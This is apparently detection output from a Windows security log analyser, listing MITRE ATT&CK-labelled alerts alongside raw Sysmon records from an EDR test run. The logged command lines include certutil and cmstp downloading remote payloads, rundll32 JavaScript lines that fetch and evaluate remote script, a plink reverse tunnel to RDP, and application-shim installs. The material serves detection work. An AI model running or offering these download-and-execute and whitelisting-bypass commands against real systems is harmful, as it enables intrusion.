0 + 0x8000000000000000 + + + 4991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.285 + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.285 + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4990 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.246 + 747F3D96-666B-5D3F-0000-001051638E00 + 5840 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm qc -q + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966503 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:00:01.529 + 365ABB72-5851-5C91-0000-00107D050A00 + 2716 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-5851-5C91-0000-0010E1030A00 + 2772 + C:\Windows\System32\wsqmcons.exe + C:\Windows\System32\wsqmcons.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4988 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:30.462 + 747F3D96-6666-5D3F-0000-0010AE068E00 + 1464 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-6666-5D3F-0000-001016F78D00 + 2244 + C:\Windows\System32\cmd.exe + cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966501 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:58:44.187 + 365ABB72-5804-5C91-0000-001044DE0900 + 2456 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 2 + System + MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-57FB-5C91-0000-00104FD40900 + 2128 + C:\osk.exe + "c:\osk.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4986 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:30.221 + 747F3D96-6666-5D3F-0000-001016F78D00 + 2244 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4983 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:25.180 + 747F3D96-6661-5D3F-0000-00107AB88D00 + 6428 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4982 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:34:20.735 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49833 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4981 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:34:20.619 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49832 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4980 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.410 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4980 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.410 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4978 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.134 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);})",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966480 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:58:20.894 + 365ABB72-57EC-5C91-0000-001097810900 + 2848 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Users\user01\Desktop\titi.sdb" + C:\Users\user01\Desktop\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4975 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.202 + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966464 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:47.364 + 365ABB72-569F-5C91-0000-0010D96C0800 + 3140 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1940899 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-02-16 10:02:21.934 + 365ABB72-DFAD-5C67-0000-0010E0811500 + 2312 + C:\Users\IEUser\Desktop\plink.exe + Release 0.70 + Command-line SSH, Telnet, and Rlogin client + PuTTY suite + Simon Tatham + plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test + C:\Users\IEUser\Desktop\ + PC01\IEUser + 365ABB72-D6AB-5C67-0000-002056660200 + 0x26656 + 1 + High + SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4 + 365ABB72-D92A-5C67-0000-0010CB580900 + 3904 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"))",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4971 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:10.619 + 747F3D96-6652-5D3F-0000-001058828C00 + 348 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test") + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 